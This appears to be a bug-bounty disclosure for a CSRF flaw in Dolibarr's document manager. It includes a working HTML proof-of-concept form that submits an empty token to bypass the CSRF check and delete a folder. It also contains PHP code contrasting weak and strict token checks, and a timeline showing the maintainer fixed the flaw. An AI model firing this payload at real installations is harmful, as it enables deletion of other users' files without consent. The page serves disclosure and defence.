Cross-Site Request Forgery (CSRF) in dolibarr/dolibarr


Reported on

Jul 18th 2021

✍️ Description

In this directory "" the attacker can perform a CSRF attack to remove any folder.

In this directory the application takes a parameter named "token", and I set the "token" parameter value to nothing, as in "token=&action=add.....", to bypass the "token" check.

First open the following "PoC.html", then click the button that appears on the page; after that you can notice that the folder for section 211 is removed.

🕵️‍♂️ Proof of Concept


  <script>history.pushState('', '', '/')</script>
  <form action="">
    <input type="hidden" name="section" value="211" />
    <input type="hidden" name="module" value="ecm" />
    <input type="hidden" name="backtopage" value="&#47;core&#47;ajax&#47;ajaxdirtree&#46;php&#63;file&#95;manager&#61;1&amp;website&#61;&amp;pageid&#61;" />
    <input type="hidden" name="action" value="confirm&#95;deletedir" />
    <input type="hidden" name="confirm" value="yes" />
    <input type="hidden" name="token" value="" />
    <input type="hidden" name="deletedirrecursive" value="" />
    <input type="submit" value="Submit request" />
  </form>
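The bypass in this report works because an empty "token" value is treated as "no token to check" rather than as a failed check. The following is an added illustration, not Dolibarr's code and not the fix commit referenced below: the weak pattern that lets `token=` through, beside a check that rejects a missing or empty token before any state change. The `$_SESSION['token']` key and the function names are assumed.

```php
<?php
// Illustrative example, not Dolibarr's code. The session key name and the
// helper names are assumptions made for this demonstration.

// Weak pattern: the comparison only runs when a token was supplied, so a
// request carrying "token=" (empty) never reaches the mismatch branch.
function csrf_check_weak(array $post, array $session): bool
{
    if (!empty($post['token']) && $post['token'] !== $session['token']) {
        return false; // a wrong token is rejected...
    }
    return true;      // ...but a missing or empty token is accepted
}

// Hardened pattern: a state-changing action always requires a token, the
// session must actually hold one, the parameter must be a string, and the
// comparison is constant-time via hash_equals().
function csrf_check_strict(array $post, array $session): bool
{
    if (empty($session['token']) || !isset($post['token']) || !is_string($post['token'])) {
        return false;
    }
    return hash_equals($session['token'], $post['token']);
}

// Constructed sample data: a session with a real token, a request shaped like
// the PoC form above (empty token), and a legitimate submission of the same action.
$session = ['token' => bin2hex(random_bytes(16))];
$forged  = ['action' => 'confirm_deletedir', 'section' => '211', 'confirm' => 'yes', 'token' => ''];
$legit   = $forged;
$legit['token'] = $session['token'];

// Run both checks against the forged and the legitimate request; only the
// strict check refuses the forged one while still accepting the legitimate one.
var_dump(csrf_check_weak($forged, $session));
var_dump(csrf_check_strict($forged, $session));
var_dump(csrf_check_strict($legit, $session));
```

The same rule applies to any request that changes server state: treat an absent or empty token exactly like a wrong one, and fail closed before the action handler runs.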

💥 Impact

This vulnerability is capable of removing any folder from any user's documents.

We have contacted a member of the dolibarr team and are waiting to hear back a year ago
Laurent Destailleur validated this vulnerability a year ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur marked this as fixed with commit 0e18bd a year ago
Laurent Destailleur has been awarded the fix bounty
This vulnerability will not receive a CVE